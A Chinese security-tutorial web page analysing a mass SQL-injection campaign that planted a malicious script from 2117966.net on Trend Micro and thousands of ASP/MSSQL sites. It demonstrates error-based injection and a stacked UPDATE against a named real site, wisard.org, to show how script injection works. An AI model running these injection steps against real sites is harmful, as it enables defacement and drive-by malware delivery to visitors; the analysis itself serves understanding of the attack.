专业网站运营平台
首页 网络安全 安全教程 正文
我要投稿

关于趋势科技等网站被攻击的分析

安全教程
2023-12-01 0 722

一. 首先在网上找到了这次攻击的新闻报道

http://www.nsfocus.net/news/6697

http://hi.baidu.com/secway/blog/item/e80d8efa4bf73ddab48f31a3.html

通过GOOGLE搜索到了相关被黑的页面

http://www.google.cn/search?hl=zh-CN&q=site:trendmicro.com www.2117966.net f**kjp.js&btnG=Google 鎼滅储&meta=&aq=f

趋势科技的页面被插入过http://www.2117966.net/f**kjp.js相关的JS挂马。

二. 直接查找这个JS相关的信息

http://www.google.cn/search?complete=1&hl=zh-CN&newwindow=1&q=www.2117966.net f**kjp.js&meta=&aq=f

发现了12,500项符合的结果,这些返回的结果信息都是当前页面被插入了JS挂马。

通过分析发现被黑的页面都有如下特征:

1.被修改页面的网站都是ASP MSSQL的架构。

2.被修改的页面都存在SQL注入漏洞。

三. 取了其中一个被挂马页面做了SQL注入挂马的模拟攻击:

1. http://www.wisard.org/wisard/shared/asp/Generalpersoninfo/StrPersonOverview.asp?person=5162

这个链接存在明显的SQL注入,对person参数注入语句having 1=1,将暴出当前页面注入点的表名为coordinator,字段名ShCoordinatorSurame。

http://www.wisard.org/wisard/shared/asp/Generalpersoninfo/StrPersonOverview.asp?person=5162 having 1=1

—————————

Microsoft OLE DB Provider for ODBC Drivers error ‘80040e14′

[Microsoft][ODBC SQL Server Driver][SQL Server]Column ‘coordinator.ShCoordinatorSurame’ is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause.

/wisard/shared/asp/Generalpersoninfo/StrPersonOverview.asp, line 20

—————————-

2. 修改暴出的当前页面的表名,字段名内容为插入JS的代码来实现挂马

http://www.wisard.org/wisard/shared/asp/Generalpersoninfo/StrPersonOverview.asp?person=5162;update coordinator set ShCoordinatorSurame=’’ where 1=1––

修改coordinator 表 ShCoordinatorSurame 字段内容为,同时设一个1=1为真的逻辑条件就可以修改当前页面查询数据的内容.

就可以实现在有SQL注入点的页面直接挂马。

四.总结.

这次大规模攻击的流程应该是自动化的:

1.通过先进的扫描技术批量收集到几万网站的SQL注入漏洞。

2.针对漏洞攻击,进行自动化的SQL注入挂马。

现今虽然SQL注入漏洞已经很老了,但是这次黑客在一天内同时对数万网站攻击挂马的技术却是很惊人的,连趋势这样的安全公司也未能幸免。

收藏 (0) 打赏

感谢您的支持,我会继续努力的!

打开微信/支付宝扫一扫,即可进行扫码打赏哦,分享从这里开始,精彩与您同在
点赞 (0)

悠久资源 安全教程 关于趋势科技等网站被攻击的分析 https://www.u-9.cn/security/jiaocheng-security/8670.html

上一篇: 实战讲解跨站入侵攻击
下一篇: linux入侵踪迹隐藏攻略
常见问题

相关文章

魔兽世界服务器被DDoS攻击怎么办?DDoS攻击防御方法
魔兽世界服务器被DDoS攻击怎么办?DDoS攻击防御方法
安全教程
2个月前 615
封UDP的服务器真的打不了么?封UDP、封海外服务器
封UDP的服务器真的打不了么?封UDP、封海外服务器
安全教程
2个月前 606
大势至上网行为管理系统核心优势,大势至上网行为监控系统特点
大势至上网行为管理系统核心优势,大势至上网行为监控系统特点
安全教程
5个月前 503
大势至上网行为管理系统核心功能,局域网安全管理,局域网上网行为监控
大势至上网行为管理系统核心功能,局域网安全管理,局域网上网行为监控
安全教程
5个月前 966
猜你喜欢
发表评论
暂无评论
官方客服团队

为您解决烦忧 - 24小时在线 专业服务

联系官方团队 在线提交工单
TA的动态
总裁主题

分享最新WordPress教程共同学习,共同进步,共同成长!

QQ交流群
悠久资源

QQ交流群

您的支持,是我们最大的动力!
热门文章
热门评论
终身VIP会员限时钜惠
首页 首页 菜单 首页 首页